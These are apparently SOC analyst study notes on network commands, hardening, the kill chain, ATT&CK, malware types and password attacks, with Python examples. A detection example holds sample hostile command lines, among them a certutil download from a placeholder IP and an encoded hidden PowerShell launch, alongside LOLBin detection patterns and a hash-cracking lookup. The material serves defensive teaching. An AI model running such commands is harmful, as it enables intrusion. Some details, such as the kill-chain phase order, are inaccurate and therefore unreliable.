Note: whenever a security incident is triggered and the security alert does not contain the hostname or computer name, how do we verify the hostname or FQDN of the system in the alert?
1) Go to the cmd prompt and use nslookup, providing the targeted IP address
2) Contact the AD team to get the details

Example alert: one of the systems got compromised by malware
Timestamp: 26/09/2024 7am
IP address: 10.10.10.1
Hostname: NA
EDR: Block
File name: test.dll
File: c:/programfiles/users/downloads/test.dll
Hash value: abcd1011de0121
OS: Windows

5) Hostname: how to verify the hostname of the computer
syntax
cmd>hostname
cmd>ipconfig /all

6) netstat: it can be used to identify which ports are running and which ports are closed
syntax
cmd>netstat

7) Traceroute: it traces, between source and destination, how many hops are available along with the time (interview question)
syntax
cmd>tracert

8) pathping: it can be used to identify how many hops are available between source and destination
cmd>pathping x.x.x.x
cmd>pathping hostname.com

9) ARP: to verify the ARP entries in any particular system
syntax
cmd>arp -a
cmd>arp -g
cmd>arp -s
cmd>arp -d
Network architecture diagram: it is a logical or pictorial representation or blueprint of where which type of devices are deployed, in a diagrammatic or architectural way; this is called the network architecture diagram.

Couple of frameworks for designing the architecture of the network

1) SABSA
2) TOGAF
3) Cisco

Server security or infra security

1) How to protect servers?
2) VM (regular patch updates)

How to protect servers?
1) Strong or complex passwords
   A) Uppercase, lowercase, a numerical number and a special character; the minimum length should be 12-16 characters
   B) MFA (multifactor authentication)
   C) Default passwords should not be used
   D) Consecutive passwords should not be repeated
   E) Once every 90 days we have to change the password
2) Implement RBAC controls (based on the user actions or tasks or roles)
3) CIS hardening benchmark (initial security configurations or implementations)
4) Regular patch updates
5) Regularly, or monthly once, run vulnerability scans and patch those vulnerabilities
6) Implement AV / EDR solution
7) Implement DLP solution
8) Encrypt the disk (disk encryption): data-at-rest level of encryption
9) Have to implement FIM solution
10) All the server logs should be integrated into the SIEM tool, and create a rule for triggering an alert whenever any malicious activity happens
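The password rules in item 1 (A to E), as an added Python example that is not part of the original notes: a policy check for complexity, minimum length, default passwords and reuse of recent passwords. The default-password list is constructed here, and the history digest is only illustrative (a production system stores passwords with a slow, salted hash).

```python
"""Password policy check matching the server-hardening rules in the notes:
upper/lower/digit/special character, 12-16 minimum length, no default
passwords, and no reuse of a recent password."""
import hashlib
import string

MIN_LENGTH = 12                          # notes: minimum length 12-16 characters
HISTORY_DEPTH = 5                        # how many previous passwords may not be reused
# Constructed list of vendor/default passwords that must never be accepted.
DEFAULT_PASSWORDS = {"admin", "password", "password123", "changeme", "root", "p@ssw0rd"}


def _digest(password):
    """Illustrative history digest only; real systems must use a slow, salted hash."""
    return hashlib.sha256(password.encode("utf-8")).hexdigest()


def check_password(candidate, history_digests=()):
    """Return the list of policy violations (an empty list means acceptable)."""
    problems = []
    if len(candidate) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not any(c.isupper() for c in candidate):
        problems.append("no uppercase letter")
    if not any(c.islower() for c in candidate):
        problems.append("no lowercase letter")
    if not any(c.isdigit() for c in candidate):
        problems.append("no digit")
    if not any(c in string.punctuation for c in candidate):
        problems.append("no special character")
    if candidate.lower() in DEFAULT_PASSWORDS:
        problems.append("default or vendor password")
    if _digest(candidate) in set(history_digests[-HISTORY_DEPTH:]):
        problems.append("reused from password history")
    return problems


def rotate_password(candidate, history_digests):
    """Apply the check at the 90-day rotation; on success record the digest in history."""
    problems = check_password(candidate, history_digests)
    if problems:
        return False, problems
    history_digests.append(_digest(candidate))
    return True, []


if __name__ == "__main__":
    history = []
    for pw in ("Winter2024!Secure", "Winter2024!Secure", "short1!", "P@ssw0rd", "Spring2025#Rotate"):
        ok, why = rotate_password(pw, history)
        print(f"{pw!r:22} -> {'accepted' if ok else 'rejected: ' + ', '.join(why)}")
```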

2) Endpoint security: endpoint protection (EPP). Endpoint = end-user machine or employee machine or host machine
Examples of endpoints are
1) LT
2) MAC
3) WS
4) DT
5) Servers

Protecting endpoints or host machines using different types of solutions or tools is called endpoint protection or endpoint security

Examples of endpoint security solutions are

1) AV/EDR/XDR
2) DLP
3) HIDS/HIPS
4) Data-at-rest encryption (endpoint)
5) FIM
6) MDM

Outbound traffic / outgoing traffic: traffic going away from internal or trust to external or public or untrust or internet is called outbound or outgoing traffic

Inbound traffic or incoming traffic: traffic coming from external or untrust or internet or public to internal or trust or private is called inbound traffic or incoming traffic

NetFlow data: the combination of both inbound traffic and outbound traffic is called NetFlow data. Note: the NetFlow terminology is provided by Cisco.

Vendor                            Flow data name
Cisco routers and switches        NetFlow
HP routers and switches           sFlow
Juniper routers and switches      J-Flow
Avaya routers and switches        NetFlow
IBM routers and switches          NetFlow
HP routers and switches           NetFlow

Network security or perimeter security: if we want to protect against attacks from the network or perimeter side, we can use a couple of solutions to safeguard our network or organization; these are called network security solutions

1) NGFW
2) NIDS/NIPS                        (Network 3-tier architecture)
3) Proxy (secure web gateway)

Email security or email gateway: for phishing email protection we deploy or implement an email security solution or email gateway. The email gateway acts as a gateway or bridge between external phishing email attackers and our internal users

Application (product or mobile or OT, IoT, IIoT) security
1) WAF
2) Secure SDLC life cycle

Information security: overall organization security

1) GRC (risk assessment, auditing and compliance)
2) BCP/DR
3) Incident management

Cloud security: whatever on-premise controls are deployed, the same way we have to deploy security controls in the cloud as well; this is called cloud security

Cyber security: to protect or safeguard the entire organization's data or information, endpoints, servers, databases, network, cloud, applications etc., 24*7*365 days, is called cyber security

Types of zones (Cisco security level)
1) Internal / trust                            100
2) DMZ / DMG                                   50
3) Untrust / public / external / internet      0

DMZ/DMG zone: demilitarized zone

It acts as a boundary between the trust zone and the untrust zone

Nmap tool

Nmap's full form is Network Mapper; another name for it is Zenmap. It is used to identify which ports are open and which services, applications or processes are running against each and every port.

Port scanning: running a scan against all the ports and identifying which ports are open, which ports are closed and which ports are filtered is called port scanning.

Latest stable version of Nmap is 7.95


1) Cyber kill chain process: the cyber kill chain process is an offensive mechanism
Definition: it is a step-by-step process or phase-by-phase approach of how the attacker will do hacking of the targeted machine; this is called the cyber kill chain process

Cyber kill chain process steps or phases are

1) Recon or reconnaissance
2) Weaponization
3) Transport/delivery
4) Installation
5) Exploitation
6) Command and control
7) Actions on objective

1) Recon or reconnaissance: in this phase the attacker gathers information or selects the target or targeted machine. Example: port scanning
2) Weaponization: in this phase the attacker uses malicious scripts, URLs or malicious code as weapons and injects them either on the input side, or maybe in a document, or maybe using macros. Examples: vulnerability scanning, input validation
3) Transport / delivery: the attacker delivers the payload to the targeted machine or system. Examples: bribing internal employees, phishing email
4) Installation: in this phase the attacker monitors continuously, identifies any existing vulnerability or weakness, and installs the malicious code or payload. Example: Maze, April 2020; May 2021
5) Exploitation: once the attacker identifies the weakness he will apply the attack
6) Command and control (C2C or C2): the attacker controls the targeted machine remotely and operates it as command control and remote control
7) Actions on objective (goal): finally the attacker gains unauthorised access or sensitive data exposure, or data breach or data violation or data exfiltration, and whatever the attacker needs (or bitcoins)

2) MITRE ATT&CK framework

A = Adversary (hacker or intruder or threat actor)
T = Tactics
T = Techniques
CK = Common Knowledge (knowledge base or database)

Definition: it is a centralised knowledge base of the TTPs (tactics, techniques and also procedures) the attacker uses to do hacking; it also provides defensive mechanisms like prevention, solution, mitigation or safeguards.
The MITRE ATT&CK framework is a combination of both offensive and also defensive mechanisms.

The MITRE ATT&CK framework can be used by the blue team (SOC), red team, threat hunters, malware analysts, cyber security analysts and also reverse engineering teams.

Industry size:
Small scale industry                       0-1000
Medium scale industry                      1000-10000
Enterprise (CMM5, big data, MNC)           10000+

Tactics === 14 tactics; static in nature
Techniques === 500+; techniques and procedures are dynamic in nature, because they depend on how the attacker does hacking
Procedures === 1000+

Tactics
1) Reconnaissance (4 techniques)
2) Resource development
3) Initial access
4) Execution
5) Persistence
6) Privilege escalation, e.g. Abuse Elevation Control Mechanism: Setuid and Setgid, Bypass User Account Control, Sudo and Sudo Caching, Elevated Execution with Prompt
7) Defense evasion
8) Credential access
9) Discovery
10) Lateral movement
11) Collection
12) Command & Control
13) Data exfiltration
14) Impact

Types of network / cyber / OWASP Top 10 / wireless attacks

1) Authentication failure
2) Malware category
3) Spoofing
4) Flooding category
5) OWASP Top 10
6) Wireless or Wi-Fi
7) Others / miscellaneous (approximately 70+)

1) Malware category
Malware: malicious software
Malware is developed by an attacker or intruder or hacker or adversary or threat actor for malicious activity, abnormal activity, illegitimate activity or suspicious activity, so that the attacker gains unauthorised access, or data exfiltration or sensitive data exposure or data breach or data violation.

Malware mechanisms are
1) File-oriented malware
2) Fileless-oriented malware

File-oriented malware: the malware happens through a hash value and also through a file format (.dll, .doc, .ppt, .csv, .exe, .htm etc.). Indicator: hash value
Fileless-oriented malware: it occurs without any file, using process execution
ex: LOLBins (living off the land binaries)
PowerShell or Python or Perl
WMI
Windows registry keys

Symptoms of malware

1) System performance issues
2) System slowness
3) CPU utilization reaching very high
4) RAM utilization reaching very high
5) BW utilization reaching high
6) Automatic restarts
7) Automatic shutdown
8) Cursor movement

Sources of malware
1) Drive-by downloads: downloading malicious files from websites or applications
2) Phishing email malware attachments
3) Removable devices (pendrive, USB, memory stick or external hard disk)

Malware types or malware attacks are
1) Virus
2) Worm
3) Trojan
4) RAT (remote access trojan)
5) Spyware
6) Adware
7) Keyloggers or key strokers or key logging
8) Mimikatz
9) Logic bomb
10) Rootkit
11) Ransomware
12) Botnet
13) Privilege escalation
14) Zero day
15) PUP (potentially unwanted program)
16) Hacking tool
17) LOLBins

Mitigations:
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway or email security solutions

1) Virus
A virus is malicious program code that the attacker injects into the targeted machine. It attaches itself to a host file or program and needs that file to be run (usually by the user) in order to execute; once running it copies itself into other files on the same system. Following the cyber kill chain the attacker compromises the machine and gains unauthorised access or sensitive data exposure.
Note: a virus self-replicates within a single system.

Mitigation / eradication / prevention:
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions
2) Worm
A worm is malicious program code that the attacker injects into the targeted machine. Unlike a virus it needs no host file and no user action: once one system is compromised, the worm spreads itself to other systems over the network by exploiting network protocols and services (for example the SMB flaw used by WannaCry). The attacker gains unauthorised access or sensitive data exposure on every system it reaches.
Note: a worm self-replicates across the entire LAN (and beyond, if reachable).

Mitigation / eradication / prevention:
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions
5) Network segmentation and patching of exposed services, so one infected host cannot reach the rest

3) Ransomware
Ransomware is malicious program code that the attacker injects into the targeted machine after identifying a vulnerability; following the cyber kill chain the attacker encrypts a single file, a group of files or the entire file system with an encryption key that only the attacker holds. The attacker then demands payment (money, bitcoin or another digital currency) for the decryption key; if the ransom is not paid the attacker threatens to delete the files or, in double-extortion variants, to publish the stolen data.

Ransomware became headline news in 2017, when a series of large-scale attacks happened between May and August (ransomware itself is older, but 2017 was the turning point). The first of these widely reported attacks were WannaCry and Petya/NotPetya.
More than 6000+ ransomware attacks have since been reported in the news.
Well-known ransomware attacks:
1) WannaCry (May 2017) - spread as a worm using the EternalBlue SMB exploit
2) Petya / NotPetya (June 2017) - used EternalBlue and EternalRomance
3) Kaseya (2021) - REvil ransomware delivered through the Kaseya VSA supply chain
4) Akira
5) Maze - originally known as ChaCha ransomware
6) LockBit 3.0

Mitigations
1) Regular, tested, offline backups (the only control that restores the data)
2) AV/EDR/XDR
3) NGFW
4) Malware analysis tools
5) Email gateway / email security solutions

5) Mimikatz
Mimikatz is not malware in the strict sense but a post-exploitation credential-dumping tool. After the attacker has compromised a Windows system (as per the cyber kill chain), Mimikatz reads credentials out of memory (the LSASS process): plaintext passwords, NTLM hashes and Kerberos tickets. These are then used for password cracking, pass-the-hash, pass-the-ticket, golden / silver ticket attacks and lateral movement, giving the attacker unauthorised access and sensitive data exposure.

Mitigation
1) AV/EDR/XDR (Mimikatz is widely detected; alert on processes reading LSASS memory)
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions
5) Credential Guard / LSA protection and least-privilege admin accounts, so there is less to dump

6) Spyware
Spy = secret agent.
Spyware is malicious program code developed by the attacker and inserted into the targeted machine; it secretly monitors the end user, gathers the confidential data they access (browsing, credentials, documents) and sends it back to the attacker, who thereby gains unauthorised access or sensitive data exposure.

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions

7) Keylogger (keystroke logging)
A keylogger is malicious program code that the attacker installs on the targeted machine; following the cyber kill chain, the attacker exploits a weakness in the machine to get it installed. From then on every key the end user types is captured and sent to the attacker, including confidential data such as:
- PII data (personally identifiable information; GDPR compliance applies)
- PHI (protected health information)
- Credentials for the organisation's servers, applications, databases, cloud consoles etc.

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions
5) MFA, so that a captured password alone is not enough to log in

8) Backdoor
A backdoor is a hidden way into a system that bypasses its normal authentication (an alternative way in). Backdoors are usually planted in combination with other malware, for example:
Backdoor + Trojan
Backdoor + Virus
Backdoor + Worm

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions

9) Trojan
A trojan is malware disguised as something useful or legitimate to the end user (a free tool, a cracked application, a document), so that the user installs or runs it willingly. From the attacker's point of view it performs abnormal or malicious activity, and the attacker gains unauthorised access or sensitive data exposure.

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions

10) RAT (Remote access trojan)
A RAT is malicious software that the attacker develops and inserts into the targeted machine; once the machine is compromised (as per the cyber kill chain), the RAT connects back to the attacker's command-and-control (C2) server so that the attacker can control the machine remotely. In this way the attacker gains unauthorised access or sensitive data exposure.

Mitigation
1) AV/EDR/XDR
2) NGFW (block and alert on outbound C2 traffic)
3) Malware analysis tools
4) Email gateway / email security solutions

11) Zero-day attack
A zero-day vulnerability is a weakness in software (a commercial product, an open-source library or package, or a service) that is not yet known to the vendor, or is known but has no patch or fix available yet; a zero-day attack exploits such a vulnerability before the vendor releases a patch. The name refers to the vendor having had "zero days" to fix it.

Note: zero days apply equally to commercial and open-source software, libraries and packages.

Examples of libraries, packages or services (TPS, third-party software) that may be installed in an application, product, mobile app or any asset (servers, databases, end-user machines):
1) OpenSSL
2) Apache Tomcat
3) Spring Boot framework
4) Log4j
5) Oracle Java
6) OpenJDK
7) Python
8) PowerShell
9) React.js

How to fix a zero-day vulnerability? Mitigation?

Whenever a zero-day attack is in the news we follow the steps below:
1) Temporary fix (partial fix / workaround)
2) Permanent fix (vendor releases the patch)

1) Temporary fix: gather the business IPs and business domains of the affected assets from the network engineers / network administrators / client, and until the patch is available reduce the exposure: block known malicious IPs and domains at the perimeter, restrict the vulnerable service to private-to-private (node-to-node) communication only using iptables or firewall rules, and apply any vendor-published workaround (for example a configuration flag or removing the vulnerable component). By doing this we are minimising the risk, not eliminating it.

2) Permanent fix: once the vendor releases the new patch, our internal stakeholders test it in the test environment; if everything is successful they raise a change request through the change management process and implement the patch in the production environment.

Example: Log4j (Log4Shell, CVE-2021-44228) was disclosed in December 2021 with the highest severity (CVSS 10.0). The Apache Log4j project (not Apache Tomcat) released fixed versions in quick succession over the following days (2.15.0, then 2.16.0 and 2.17.0 as further issues were found), so the permanent fix had to be repeated several times while the temporary fix stayed in place.

Famous examples of zero-day attacks:
1) SolarWinds supply-chain attack
2) FY management console exposed to the public
3) Log4j (Log4Shell)
4) Microsoft remote code execution (RCE) vulnerabilities
5) Ivanti (Pulse Secure) VPN zero-day vulnerabilities

Note: whenever a zero-day attack is in the news, what are the security analyst's roles and responsibilities?
1) Run a vulnerability scan (and check the software inventory) to verify whether the affected TPS, e.g. Oracle Java, is in use in our organisation, and record the result in the report.
Option 1) If the TPS is not in use in our organisation, there is no impact to the organisation.
Option 2) If we are using the TPS named in the news, we have to fix it in two ways: the temporary fix now, and the permanent fix when the patch is released.
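Added example (not from these notes): the "is the affected TPS in use?" check from the analyst's step 1, done against a software inventory export instead of by hand. The inventory lines and hostnames are constructed for the example; the only real data point is the Log4Shell affected range (log4j-core 2.0-beta9 up to and including 2.14.1, fixed from 2.15.0). The version parser handles the pre-release and letter-suffix forms that appear in such inventories (2.0-beta9, OpenSSL 1.0.1f), which a plain string comparison gets wrong.

```python
import re
from typing import List, Tuple

# Constructed inventory: "host,component,version" (what a vuln scanner / SBOM export looks like)
INVENTORY = """\
web-01,log4j-core,2.14.1
web-02,log4j-core,2.17.1
api-01,log4j-core,2.0-beta9
db-01,openssl,1.1.1k
batch-01,log4j-core,1.2.17
"""

def parse_version(v: str) -> Tuple[int, ...]:
    """Comparable tuple: '2.14.1' -> (2,14,1,0,0,0); '2.0-beta9' -> (2,0,0,0,-1,9)
    (a pre-release sorts below the final release); OpenSSL-style '1.0.1f' -> (1,0,1,6,0,0)."""
    main, _, pre = v.partition("-")
    nums, letter = [], 0
    for part in main.split("."):
        m = re.fullmatch(r"(\d+)([a-z]?)", part)
        if not m:
            raise ValueError(f"unparseable version: {v}")
        nums.append(int(m.group(1)))
        if m.group(2):
            letter = ord(m.group(2)) - ord("a") + 1
    while len(nums) < 3:
        nums.append(0)
    pre_flag, pre_num = 0, 0
    if pre:
        pm = re.match(r"[a-zA-Z]+(\d*)", pre)
        pre_flag, pre_num = -1, int(pm.group(1) or 0) if pm else 0
    return tuple(nums[:3]) + (letter, pre_flag, pre_num)

def is_affected(version: str, first_bad: str, last_bad: str) -> bool:
    """True when version lies inside the vendor's published affected range (inclusive)."""
    return parse_version(first_bad) <= parse_version(version) <= parse_version(last_bad)

def affected_assets(inventory: str, component: str, first_bad: str, last_bad: str) -> List[str]:
    hits = []
    for line in inventory.strip().splitlines():
        host, comp, ver = [f.strip() for f in line.split(",")]
        if comp == component and is_affected(ver, first_bad, last_bad):
            hits.append(host)
    return hits

def triage(inventory: str, component: str, first_bad: str, last_bad: str) -> str:
    """The two options from the notes, decided from data instead of memory."""
    hits = affected_assets(inventory, component, first_bad, last_bad)
    if not hits:
        return "Option 1: component not in use in an affected version; no impact"
    return "Option 2: temporary fix now, permanent fix after patch; hosts: " + ", ".join(hits)

if __name__ == "__main__":
    print(triage(INVENTORY, "log4j-core", "2.0-beta9", "2.14.1"))
```

Note that batch-01 (Log4j 1.2.17) is correctly not flagged for CVE-2021-44228, and web-02 (2.17.1) is already above the range; only the hosts that actually need the temporary fix appear in the report.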

12) Botnet
Bot = robot
Net = network / internet
Botnet = a network of robots (compromised machines)

The attacker injects malicious software into machines on the local area network from the internet (a public network), via phishing emails or the other malware sources listed above. Once the targeted machines are compromised they connect to the attacker's command-and-control server, and the attacker controls all of them together, typically to launch DDoS attacks, send spam or mine cryptocurrency.
Whoever controls the compromised machines is called the bot herder (the attacker); the compromised machines themselves are called bots or zombies.

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions

13) Adware (advertisement software)
Adware's full form is advertising-supported software. The attacker uses potentially unwanted programs, malicious URL links or pop-ups; malware is injected into the pop-up, PUP or advertising software, and whenever the end user clicks, the malware is installed on the end user's (targeted) machine as per the cyber kill chain. In this way the attacker gains unauthorised access or sensitive data exposure.
Example: PUP, PUA, pop-ups, malicious URL links

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions
5) Proxy / web gateway with ad and URL filtering

14) Rootkit attack

Every computer has several kinds of account:
- User account: every employee in the organisation has user-level access on their endpoint.
- Service account: used by software to run scheduled jobs such as regular patch updates, security patch updates and backups.
- Local admin account: used to install any software or tool on the machine.
- Administrator / root: the account with the highest privilege; full control to add, delete, modify or update data and configuration.

Root = in Unix terminology the highest privilege, access or permission level is called root.
Kit = a set of software tools.

Rootkit attack definition: the attacker injects malicious code that gains root (administrator, or even kernel) level access and then hides its own presence (processes, files, network connections, registry entries) from the operating system and the security tools running on it. With root-level access the attacker can:
1) change passwords or admin credentials
2) delete existing accounts
3) update, modify or add configuration files
4) change the registry keys

Mitigations
1) RBAC
2) Implement AV/EDR/XDR
3) Implement NGFW
4) Implement email security solutions or an email gateway
5) Implement anti-malware or malware analysis tools
6) Memory dump analysis (a rootkit hides from tools on the live host, so analyse the memory image offline)
7) Secure Boot / measured boot, which blocks boot- and kernel-level rootkits from loading

16) Hacking tool
A hacking tool is a piece of software (often a dual-use tool such as a port scanner, credential dumper or remote-access utility) that the attacker drops onto the targeted machine; once the attacker identifies a weakness, the tool is used to exploit it, and in this way the attacker gains unauthorised access or sensitive data exposure.

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions

17) LOLBins (Living-off-the-land binaries)
The attacker uses pre-installed, legitimate, signed operating-system commands and processes for a malicious purpose. Because the binaries themselves are trusted, file-hash signatures do not fire; detection has to look at the command line and the parent process instead. LOLBins are used for illegitimate activity and the attacker gains unauthorised access or sensitive data exposure.
LOLBins are fileless-oriented processes.
Example LOLBins:
1) PowerShell (and on Unix hosts the Perl / Python interpreters)
2) WMI (wmic.exe)
3) PsExec (Sysinternals)
4) reg.exe (Windows registry manipulation)
5) MSBuild.exe
6) mshta.exe (Microsoft HTML Application host)
7) certutil.exe, rundll32.exe, regsvr32.exe

18) Logic bomb
The attacker inserts malicious code into the targeted machine that stays dormant until a predefined condition is met: a date and time, or a state in which the vulnerability can be exploited safely (AV/EDR inactive or unknown, security patch updates not happening). When the condition matches, the payload executes and the attacker gains unauthorised access or sensitive data exposure. (A logic bomb is a technique; it is not the same thing as an APT, which is a type of threat actor.)

Mitigation
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions
5) Health check (AV/EDR/XDR should always be active)
6) Regular security patch updates
Note: for the whole malware category of attacks, the preventive solutions are
1) AV/EDR/XDR
2) NGFW
3) Malware analysis tools
4) Email gateway / email security solutions

Investigation - endpoint security (EPP tools)
Policies - SIEM

EPP tool deployment models: 1) hardware based, 2) software, 3) cloud based (SaaS)
Log integration methods into the SIEM: 1) Syslog, 2) API token method
SIEM tools: 1) IBM QRadar, 2) Splunk, 3) LogRhythm, 4) Azure Sentinel, 5) Exabeam, 6) Securonix
SIEM tool alerts: whenever the attacker performs abnormal, malicious, suspicious or unauthorised activity in the malware category, an alert is triggered by the correlation rules / use cases / conditions (algorithms or policies) configured for each malware attack category. As the SOC team we then perform the incident investigation.
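Added example (not from these notes): a toy version of the SIEM correlation pass described above, run over constructed process-creation events (what a Sysmon event ID 1 or an EDR process-start record boils down to). It covers both malware mechanisms from this section: file-based malware is matched by the SHA-256 of the launched file against an IOC list, and fileless activity is matched by LOLBin command-line patterns and by the Office-app-spawns-a-shell chain typical of a malicious attachment. Every hash, hostname and command line is constructed for the example; the LOLBin abuse patterns are the well-known ones for those real binaries.

```python
import hashlib
import re
from dataclasses import dataclass
from typing import List

@dataclass
class ProcessEvent:          # normalised process-start record from the endpoint agent
    host: str
    parent: str
    image: str
    cmdline: str
    file_bytes: bytes = b""  # contents of the launched file, when the agent captured it

# File-based mechanism: hash indicators. The "payload" is a constructed byte string,
# so its SHA-256 is only a known-bad hash inside this example.
FAKE_PAYLOAD = b"MZ\x90\x00constructed-dropper-for-example"
IOC_SHA256 = {hashlib.sha256(FAKE_PAYLOAD).hexdigest(): "Dropper.Example"}

# Fileless mechanism: command-line patterns for LOLBins (binary suffix, pattern, label)
LOLBIN_RULES = [
    ("powershell.exe", re.compile(r"-(enc|encodedcommand)\b|downloadstring|iex\b|bypass", re.I), "PowerShell encoded/download cradle"),
    ("mshta.exe",      re.compile(r"https?://|javascript:|vbscript:", re.I),                    "mshta remote script"),
    ("certutil.exe",   re.compile(r"-urlcache|-decode", re.I),                                   "certutil download/decode"),
    ("rundll32.exe",   re.compile(r"javascript:|\.dll,\s*\w+", re.I),                            "rundll32 script/DLL launch"),
    ("regsvr32.exe",   re.compile(r"/i:https?://|scrobj\.dll", re.I),                            "regsvr32 remote scriptlet"),
    ("wmic.exe",       re.compile(r"process\s+call\s+create", re.I),                             "WMI remote process creation"),
]
# Office application spawning a shell: the classic macro / phishing-attachment chain
OFFICE_PARENTS = {"winword.exe", "excel.exe", "outlook.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def file_based_alerts(ev: ProcessEvent) -> List[str]:
    if not ev.file_bytes:
        return []
    digest = hashlib.sha256(ev.file_bytes).hexdigest()
    name = IOC_SHA256.get(digest)
    return [f"{ev.host}: known-bad file {name} ({ev.image}, sha256={digest[:12]}...)"] if name else []

def fileless_alerts(ev: ProcessEvent) -> List[str]:
    alerts = []
    img = ev.image.lower()
    for binary, pattern, label in LOLBIN_RULES:
        if img.endswith(binary) and pattern.search(ev.cmdline):
            alerts.append(f"{ev.host}: LOLBin abuse - {label}: {ev.cmdline}")
    if ev.parent.lower() in OFFICE_PARENTS and img in SHELLS:
        alerts.append(f"{ev.host}: {ev.parent} spawned {ev.image} (macro -> shell chain)")
    return alerts

def correlate(events: List[ProcessEvent]) -> List[str]:
    """One alert line per matching rule; a real SIEM would group these into an incident per host."""
    out: List[str] = []
    for ev in events:
        out += file_based_alerts(ev) + fileless_alerts(ev)
    return out

# Constructed event sample: one dropper, one macro chain, one LOLBin download, one benign process
SAMPLE_EVENTS = [
    ProcessEvent("ws-17", "explorer.exe", "C:\\Users\\a\\Downloads\\invoice.exe", "invoice.exe", FAKE_PAYLOAD),
    ProcessEvent("ws-17", "WINWORD.EXE", "powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ProcessEvent("ws-22", "explorer.exe", "certutil.exe", "certutil.exe -urlcache -split -f http://203.0.113.9/x.txt x.txt"),
    ProcessEvent("ws-22", "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for line in correlate(SAMPLE_EVENTS):
        print(line)
```

The second event fires twice (encoded PowerShell and the Word-to-PowerShell parent chain): that is the kind of correlation a SIEM use case is built on, because neither signal alone is conclusive but both together on the same host almost always are.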

2) Authentication failure category

In this category the attacker uses trial and error, password guessing or probability to compromise the accounts / credentials of end users (endpoint, network device, application, server, database etc.), and so gains unauthorised access or sensitive data exposure.

Different attacks fall under authentication failure (the failed and successful logins generated by the attacker):
1) Dictionary attack
2) Brute-force attack
3) Pass the hash
4) Password spray attack
5) Rainbow table

19) Dictionary attack
The attacker tries a prepared list (a "dictionary") of commonly used usernames and passwords against an account to guess the password, compromises the system when one matches, and in this way gains unauthorised access or sensitive data exposure.

Examples of entries in commonly used dictionaries:
1) demo
2) admin
3) password
4) Password@123
5) 123456789
6) First name
7) Last name
8) Surname
9) Partner's name
10) Mobile number
11) Date of birth
12) TCS@2024 (company name + year)
13) IBM@2024

Mitigations
1) Implement strong or complex password policies
   a) uppercase
   b) lowercase
   c) special character
   d) number
   e) minimum length 12-16 characters
2) MFA (multi-factor authentication)
3) Account lockout policy
4) Previously used passwords should not be reused (password history)
5) Password rotation monthly or quarterly

20) Brute-force attack
The attacker systematically tries every possible combination of characters (or a very large generated set), relying on probability rather than a word list, until the password matches; in this way the attacker gains unauthorised access or sensitive data exposure. Long, complex passwords make this infeasible because the search space grows exponentially with length.

Mitigations
1) Implement strong or complex password policies
   a) uppercase
   b) lowercase
   c) special character
   d) number
   e) minimum length 12-16 characters
2) MFA (multi-factor authentication)
3) Account lockout policy
4) Previously used passwords should not be reused
5) Password rotation monthly or quarterly
6) Default passwords should not be used

21) Password spray
The attacker takes one (or a few) commonly used passwords and tries each of them against many usernames across multiple systems, staying below the lockout threshold of every individual account; whichever account accepts the password is compromised (a single system or multiple systems). This is called a password spray attack. An account lockout policy alone does not stop it, because each account sees only one or two failures.

Mitigations
1) Implement strong or complex password policies
   a) uppercase
   b) lowercase
   c) special character
   d) number
   e) minimum length 12-16 characters
2) MFA (multi-factor authent
ication)
3) Account lockout policy, plus detection of many different accounts failing from one source
4) Previously used passwords should not be reused
5) Password rotation monthly or quarterly
6) Default passwords should not be used

23) Pass-the-hash attack
Passwords are not stored in clear text; the system stores a hash value of the password. In a pass-the-hash attack the attacker does not guess or crack the password at all: having dumped the stored NTLM hash (for example with Mimikatz, see above), the attacker presents the hash itself to the authentication protocol, which accepts it because NTLM authentication is computed from the hash rather than from the password. In this way the attacker gains unauthorised access or sensitive data exposure without ever knowing the password.

Example of a password and its hash value (as recorded in the notes):
1) Password@123 = d00f5d5217896fb7fd601412cb890830 (MD5-length digest)
   25c2c9afdd83b8d34234aa2881cc341c09689aaa (SHA-1-length digest)

24) Rainbow table attack
A rainbow table is a precomputed table of password -> hash values for a huge list of candidate passwords. With a stolen hash, the attacker looks the hash up in the table instead of computing every guess, recovers the plaintext password quickly, and reuses it on more than one system. Rainbow tables only work against unsalted hashes: a per-user random salt makes each user's hash different even when the password is the same.

S.No | Username | Password | Hash value
1 | x | Password | both characters and numbers
2 | y | Password@123 | both characters and numbers
3 | z | Welcome | both characters and numbers
4 | a | welcome@123 | both characters and numbers
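Added example (not from these notes): why the precomputed lookup in a rainbow table recovers an unsalted hash instantly, and why a per-user salt plus a slow key-derivation function defeats it. SHA-1 is used for the unsalted side only because the second digest in the notes has SHA-1 length; it is not a recommendation. The word list, usernames and stored records are constructed for the example.

```python
import hashlib
import hmac
import os
from typing import Dict, Optional

# Constructed word list: the same kind of entries as the dictionary in the notes
WORDLIST = ["demo", "admin", "password", "Password@123", "123456789", "Welcome", "welcome@123", "TCS@2024"]

def sha1_hex(text: str) -> str:
    return hashlib.sha1(text.encode()).hexdigest()

def build_lookup_table(words) -> Dict[str, str]:
    """Precompute hash -> plaintext once. A real rainbow table compresses this with
    reduction chains, but the effect is the same: the work is done before the attack."""
    return {sha1_hex(w): w for w in words}

def crack_unsalted(stolen_hash: str, table: Dict[str, str]) -> Optional[str]:
    return table.get(stolen_hash)          # one dictionary lookup, no guessing at attack time

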